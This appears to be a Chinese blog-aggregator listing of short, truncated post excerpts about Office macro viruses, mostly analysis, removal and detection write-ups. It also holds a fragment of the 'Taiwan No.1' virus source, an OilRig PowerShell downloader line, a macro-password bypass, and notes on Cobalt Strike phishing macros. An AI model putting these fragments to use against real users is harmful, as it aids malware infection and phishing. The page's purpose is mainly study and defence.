E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
宏病毒
台湾一号
宏病毒
原始源代码
TaiwanNo.1病毒原始码DimSharednm(4)SubMAINDisableInput1IfDay(Now())=13Thentry:OnErrorGoto0OnErrorGototrytest=-1con=1tog$=""i=0Whiletest=-1Fori=0To4nm(i)=Int(Rnd()*10000)con=(con*nm(i))Ifi=4Thentog$=tog$+Str
hz_vs
·
2020-08-07 23:38
有毒物质
宏病毒
研究——实战研究篇
本文作者:i春秋作家——icq5f7a075d
宏病毒
专辑:https://bbs.ichunqiu.com/forum.php?
dfdhxb995397
·
2020-08-07 23:32
如何调试Word
宏病毒
,以及使用VS调试VB脚本
一般Word被嵌入了带有恶意行为的宏代码(VBA代码),当我们双击打开带有
宏病毒
的word文档的时候它的宏代码会自动运行。或者有的word默认是禁止宏运行,会弹出一个提示,是否允许运行携带的宏代码。
FFE4
·
2020-08-07 23:27
宏病毒
Excel4.0
宏病毒
查看隐藏宏代码
-01-15-Mal-Excel-Doc-Macrosheet/98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d71315260)常规
宏病毒
跟以往的
宏病毒
不太一样
FFE4
·
2020-08-07 23:27
宏病毒
宏病毒
360杀毒4.0版Office
宏病毒
免疫体验
现在,很多“办公族”喜欢到网上下载各种Word、Excel、PPT模板来简化自己的工作,但需要警惕的是,这类模板有些会携带“Office
宏病毒
”,一旦感染,电脑中的其他文件也可能遭殃,严重性影响日常工作
cometwo
·
2020-08-07 23:55
2010
遭遇Excel的
宏病毒
朋友的一台电脑,打开任何Excel(Office2003版本)都会弹出两个Excel文档,一个是希望打开的文档,另一个是:startup.xls看startup.xls的内容,马上意识到中了病毒了.(看这个startup,貌似是删除组件用的,也许是病毒作用后的清理?)打开希望打开的正常的那个文档,Alt-F11,看有宏代码,模块名是:Knight后来发现,下列路径有下列可疑文件,将之手工删除,Ex
cuichan3604
·
2020-08-07 23:55
遭遇StartUp.xls
宏病毒
当时只是以为设置的问题,后来查了好几小时才发现原来是中了个
宏病毒
,名字是:StartUp.xls,中间定位病毒的过程也比较曲折(主
benwdm
·
2020-08-07 23:36
自制StartUp
宏病毒
专杀小工具
StartUp
宏病毒
,是我从公司里看到的。危害性不大,它不会删除你任何资料,但讨厌的一点就是一直自我繁殖,让你的文件很大,而且任何Excel一打开都会传染。
a10615
·
2020-08-07 23:47
高级语言编程
宏病毒
实验
简单的
宏病毒
打开word文档,打开一个word文档,然后按Alt+F11调用宏编写窗口(或从工具->宏->VisualBasic->宏编辑器),定义宏名为一个自动宏。
W_seventeen
·
2020-08-07 23:43
病毒
绕过 office 宏密码保护
在分析一些
宏病毒
时,按下Alt+F11尝试查看宏代码,但是往往会遇到密码保护可以将文件在任意一款十六进制编辑工具中打开该文件,比如010editor,搜索DPB字符串,改成DPX注意不要减少或者增加其他字符
Interstellar____
·
2020-08-07 23:05
病毒分析
office
宏病毒
分析
1、样本信息在网上下载样本,是一个word的
宏病毒
名称713-288-4192.docMD561F1A99292A199F867B168B76FC8CC74SHA1967DA912065D014C275463917D236836967B27CACRC32A117A12E2
CMC_HHM
·
2020-08-07 23:05
病毒分析报告
宏病毒
之惨痛教训
在未知的道路上越来越菜——2019.10.18拿到一个新样本,却连最基本的
宏病毒
都没分析清楚,是真的菜,首先,分析要有一个方向,方向错了,便会浪费很多时间,而从事安全这个行业,时间是异常宝贵的。
WALINX
·
2020-08-07 23:16
学习笔记
一个简单的
宏病毒
制作过程
为了说明简单,笔者为教大家做一个简单的
宏病毒
,以此来了解
宏病毒
的作用机制,请大家不要模仿这个来搞“小动作”啊,不然,警察叔叔要请你喝茶我就没办法了^_^。
weixin_33862514
·
2020-08-07 23:42
宏病毒
相关研究
基础知识宏与
宏病毒
原文地址:https://www.52pojie.cn/thread-706440-1-1.html基础知识宏与
宏病毒
宏(英文Macro),广义上的定义是:宏就是把一系列的指令组织成一独立的命令
richard1230
·
2020-08-07 23:34
virus相关
简单
宏病毒
研究
原文地址:https://www.52pojie.cn/thread-705736-1-1.html0.前言分析这个
宏病毒
就像脱衣服一样,一层一层,甚是好玩。分析难度:一颗星。
richard1230
·
2020-08-07 23:34
virus相关
宏病毒
的研究与实例分析06——终结篇 进击的MACRO
文章目录背景VBAstomping在VBA编辑器中隐藏宏使用旧版宏警告常用的规避杀软的手法结语参考文献转自信安之路病毒分析小组组长::x-encounter背景Office版本历经十几年的变迁,现已趋于成熟,但仍存在着新老版本交替使用的问题。Office97-2003Word的文件后缀为doc,新版本的Office文件后缀为docx,包含宏的文档后缀为docm。微软是不会允许将包含宏的文档命名为d
鬼手56
·
2020-08-07 23:02
病毒分析
宏病毒
的研究与实例分析03——
宏病毒
处理篇
文章目录
宏病毒
处理思路破坏宏标志宏清除脚本手工清理宏(针对*.DOCM和*.XLSM文档)替换宏代码说明在前一章我们解析了
宏病毒
的二进制格式,本篇紧跟上文,利用
宏病毒
的二进制格式清除
宏病毒
。
鬼手56
·
2020-08-07 23:00
病毒分析
对
宏病毒
---OilRig的DNS隧道的一次脚本分析笔记
借鉴链接:对于OilRig的DNS隧道概述CreateObject("WScript.Shell").Runpowershell//创建对象调用WScript,再调用shell运行powershell{while(1)//真循环操作{try{/*(System.Net.WebClient)Web客户端类调用,常用来从URL下载资源Get-Random.dwn,其后接保存的路径*/(new-obje
HOPEAMOR
·
2020-08-07 23:00
病毒分析
一个“特别”的Word
宏病毒
深度分析
*原创作者:nickchang1.背景最近收到了一个带word附件的垃圾邮件。office附件基本也玩不出什么花来,一般就是带宏吐PE。所以我平时对这种邮件看都不看就直接删掉了,但是这两天正好闲的蛋疼,就检查下看看有没有什么新姿势。该word附件名为invoice.doc。打开发现只有如下内容,说该文件是被保护的文档,只有点击“EnableEditing”(允许编辑)和”enablecontent
qq_27446553
·
2020-08-07 23:27
Windows渗透
宏&一个简单的
宏病毒
示例
基于VisualBasicForApplications其一:录制宏在word,视图,宏,录制宏选项。操作比较简单,不再赘述。(注意根据需求选择normal还是当前文档)例如:录制宏:快捷键设为空格,将某些字段设为隐藏/空白。可以隐藏信息。(虽然很简陋)其二:编辑宏视图宏查看宏创建(注意根据需求选择normal还是当前文档)CDO组件发送邮件。用了ActiveDocument.FullName获取
dengdouweng1282
·
2020-08-07 23:16
宏病毒
宏病毒
定义
宏病毒
是利用系统的开放性专门制作的一个或多个具有病毒特点的宏的集合,这种病毒宏的集合影响到计算机的使用,并能通过文档及模板进行自我复制及传播。
孤君
·
2020-08-07 23:10
计算机病毒
宏与
宏病毒
——学习笔记
文章目录前言宏定义
宏病毒
定义系统要求/特性支持系统特点共性Word
宏病毒
(若对宏或
宏病毒
有一定了解可直接跳转于此)工作原理Word宏及其运行条件判断方法清除方法预防方法经典
宏病毒
参考文献前言近日,在某个技术论文上看到了一篇关于
宏病毒
的技术博客
Yoo_666
·
2020-08-07 23:31
恶意代码与计算机病毒
cobalt strike批量发送钓鱼邮件
0×01利用Cobaltstrike生成木马这里我们生成木马可以用cs带的HTA、OFFICE宏、word宏来使目标上线cs,这里以word
宏病毒
为例子。
weixin_30414635
·
2020-08-07 19:27
cobalt strike批量发送钓鱼邮件
cobaltstrike批量发送钓鱼邮件0×01利用Cobaltstrike生成木马这里我们生成木马可以用cs带的HTA、OFFICE宏、word宏来使目标上线cs,这里以word
宏病毒
为例子。
卿's Blog
·
2020-08-07 16:52
权限提升
内网渗透
利用Cobalt strike一步步教你发送钓鱼邮件
0×01利用Cobaltstrike制作一个word
宏病毒
首先我们需要制作一个word
宏病毒
来进行远控操作。在Cobaltstri
qq_27446553
·
2020-08-05 10:17
Cobalt
Strike
关于一些Excel
宏病毒
的清除方法整理合集
走进excel—
宏病毒
文章目录走进excel—
宏病毒
宏病毒
是什么常见的几种Excel
宏病毒
感染病毒后的情景:Book1StartupResultsPoppy、CopyMod、Blackice、Yugall
SmileWithSugar
·
2020-08-03 14:57
个人总结
excel
反病毒
中国地区2012年第三季度网络安全威胁报告
2012年第3季度安全威胁本季安全警示:PE病毒,
宏病毒
2012年第3季度安全威胁概况本季度趋势科技中国区病毒码新增特征约60万条。
亚信安全
·
2020-08-03 00:40
宏病毒
混淆分析
宏病毒
混淆分析前言静态分析动态调试提取shell指令解密指令小结前言很早之前就说要分析
宏病毒
,一直没机会,现在终于有空闲时间来分析一个混淆的比较厉害的
宏病毒
了。
1行
·
2020-07-30 23:27
病毒分析
ZT:微生物组学数据分析工具综述 | 16S+宏基因组+
宏病毒
组+宏转录组
本文转自:生信者言建立在高通量测序基础上的微生物群落研究,当前主要有三大类:基于16S/18S/ITS等扩增子做物种分类的Metataxanomics、鸟枪法打断全基因组DNA序列的Metagenomics和基于mRNA信息的宏转录组方法Meta-transcriptomics。16S,也即是我们通常所说的微生物多样性,是一种相对快速和经济适用的方法,但是PCR导致了偏好的产生,这就降低了注释准确
felixhell
·
2020-07-10 09:17
几个常见Excel
宏病毒
代码分析
目前我遇到过三种Excel
宏病毒
病毒k4.xls/ToDOLE病毒、MERALCO.XLS/pldt病毒、STARTUP.xls病毒。
因思道客
·
2020-07-10 03:46
Cobalt Strike中各种攻击脚本
cs攻击脚本位于Attacks中packages模块HTMLApplication生成恶意的HTA木马文件;MSOfficeMacro生成office
宏病毒
文件;PayloadGenerator生成各种语言版本的
2ed
·
2020-07-05 07:33
工具
Emacs 编辑器
Emacs名字的正式由来是"EditingMacros"的简称,即“宏编辑器”,当然这个“宏”和臭名昭著的“
宏病毒
”没有半点关系。也有一种说法是rms(Emacs的作者)最喜
wp4398151
·
2020-07-04 03:50
编辑器
【学习笔记】python实现excel数据处理
概述Excel固然功能强大,也有许多函数实现数据处理功能,但是Excel仍需大量人工操作,虽然能嵌入VB脚本宏,但也容易染上
宏病毒
。
Doraengineer
·
2020-06-29 05:44
数据处理
VBA Dumper v0.1.4.2, 提取office文档中的VBA代码,监查
宏病毒
恢复代码(演示版)
VBADumper0.1.4.2,填补国内同类程序空白,至少俺没在百度上找到国内谁在俺之前公开发布过类似软件,俺之后倒是有...有交流技术问题的,请联系QQ:564955427Email:
[email protected]
,转载请声明。此程序为演示版,可以在无office的环境下Dump出复合文档的VBA代码(xls\doc\pptm等),每个模块最大Dump长度不超过六百个字符,用于简单判
weixin_30485799
·
2020-06-27 20:27
word
宏病毒
通过邮件获取路径和文件名
文章目录简介思路源代码重点和难点简介利用wordVB编程实现一个脚本,设置为文档打开时运行,然后利用CDO发送电子邮件将文件的路径和名字发送到指定邮箱中。思路建立wps或者wordVB开发环境,需要下载插件,可以搜索如何开启宏功能测试VB(利用AutoOpen执行打开文档时运行)利用WordObj.ActiveDocument获取文件信息利用电子邮件实现信息传递,这里我使用的是CDO实现电子邮件发
Braylon1002
·
2020-06-25 18:13
安全
宏病毒
的研究与实例分析01——基础篇
文章目录前言基础知识宏与
宏病毒
VB基础sub与functionVB基本函数对象
宏病毒
实例分析实例1oledump.py
宏病毒
的分析技巧自动执行隐秘执行调用外部例程和命令执行字符串隐写Chr()函数Replace
鬼手56
·
2020-06-25 14:02
病毒分析
宏病毒
学习总结
宏病毒
及其防治方法总结http://www.educity.cn/labs/563436.html如果说
宏病毒
的出现曾经给反病毒软件厂商出了一道难题的话,那么电脑网络特别是因特网的出现在给人们的信息交流带来极大方便的同时
bcbobo21cn
·
2020-06-22 17:56
安全编程
计算机病毒
宏
病毒
[网络安全自学篇] 六十九.
宏病毒
之入门基础、防御措施、自发邮件及APT28样本分析
这篇文章将讲解
宏病毒
相关知识,它仍然活跃于各个APT攻击样本中,本文包括
宏病毒
基础原理、防御措施、自发邮件及APT28样本分析。基础性文章,希望对您有所帮助
Eastmount
·
2020-06-20 22:11
网络安全
漏洞挖掘
渗透&攻防
[网络安全自学篇] 七十.WannaCry勒索病毒复现及分析(三)蠕虫传播机制分析及IDA和OD逆向
前文分享了
宏病毒
相关知识,包括
宏病毒
基础原理、防御措施、自发邮件及APT28样本分析。
Eastmount
·
2020-06-20 22:11
网络安全
漏洞挖掘
渗透&攻防
系统安全
WannaCry
蠕虫
IDA逆向
分析及防御
使用Cobalr strike发送钓鱼邮件
本文参考https://www.freebuf.com/sectool/124905.html感谢前人指路前面的建立一个office
宏病毒
、克隆一个网站等操作,在这片freebuf的文章中写的很清楚详细了
This_is_Y
·
2020-06-18 20:00
Cobait Strike的socks与ew代理使用
CobaltStrike一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,winexe木马生成,windll木马生成,java木马生成,office
宏病毒
生成
Lushun
·
2020-03-27 19:00
样本分析 | virus.office.obfuscated 宏分析
宏病毒
文件信息类型:
宏病毒
MD5:ab74ee2373229626fe368a83d98f2a47病毒名:TrojanDownloader:Win32/Skidlo文件大小:121Kb
宏病毒
宏病毒
是一种寄存在文档或模板的宏中的计算机病毒
皆明
·
2020-03-17 11:24
安全亲属定律又要出马了
最近微软
宏病毒
又回来啦,一种新的勒索形式借着古老的MicrosoftWord文档内建的宏操作及其变种在全球扩散。
合天智汇
·
2020-01-02 04:24
手工查杀Excel
宏病毒
本篇讲述如何手工查杀
宏病毒
,关于
宏病毒
详细解读参见上一篇《几个常见Excel
宏病毒
代码分析》一、验视打开的Excel,按Alt+F11,看看有没有加载“k4.xls”或者“MERALCO.xls”。
因思道客
·
2019-12-31 03:54
这年头,Office文件还有
宏病毒
么?
在Office2003的年代,有种叫
宏病毒
的东东据说曾肆意扩散过,就和蠕虫一样通过Office文件传播~MacroVirus然后,微软开始出手啦!
ye4241
·
2019-12-18 05:46
利用Office模版共享进行内网渗透攻击
通过对Office可以引用局域网中的某台机器上的共享模版这一功能进行测试分析发现,如果把模版文件替换成一个恶意的文档,比如带有
宏病毒
或者带有漏洞的文档,那么,在局域网中的其他机器上打开引用了模版文件的正常文档的话
Su2Root
·
2019-12-16 02:08
Windows
宏病毒
利用
背景:最近忙的飞起,各种事情,不想吐槽,因为某些事情,还吃了口屎,啧啧啧。。。。。常见的钓鱼,社工基本技术都是这种,什么鱼叉,水坑,社工,投毒之类的,APT攻击惯用伎俩。那么今天主要利用Windowsoffice宏进行远程攻击。环境:kailLinux2018xfaceWindows10homeoffice2016直接上操作:kaillinux#gitclonehttps://github.com
APT-101
·
2019-11-17 13:00
恩本健康:做一次基因检测多少钱?
也有疾病基因检测、天赋基因检测、
宏病毒
基因检测。其中,病毒基因检测、细菌基
恩本健康0517
·
2019-11-07 22:47
恶意代码分析技巧-汇总
java【恶意代码分析技巧】04-exe_VB【恶意代码分析技巧】05-exe_Delphi【恶意代码分析技巧】06-exe_.net【恶意代码分析技巧】07-exe_自动安装【恶意代码分析技巧】08-文档
宏病毒
超人还可以飞
·
2019-09-19 17:00
软考网络管理员学习笔记8之第八章网络安全技术
考法分析】本考点的基本考法是能通过病毒名前缀判断出是哪种病毒,了解不同类型病毒所产生的危害【要点分析】1、常见病毒前缀有trojan(木马病毒)、Hack(黑客病毒)、worm(蠕虫病毒)、macro(
宏病毒
jayjaydream
·
2019-09-01 00:00
软考网络管理员备考专栏
上一页
1
2
3
4
5
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他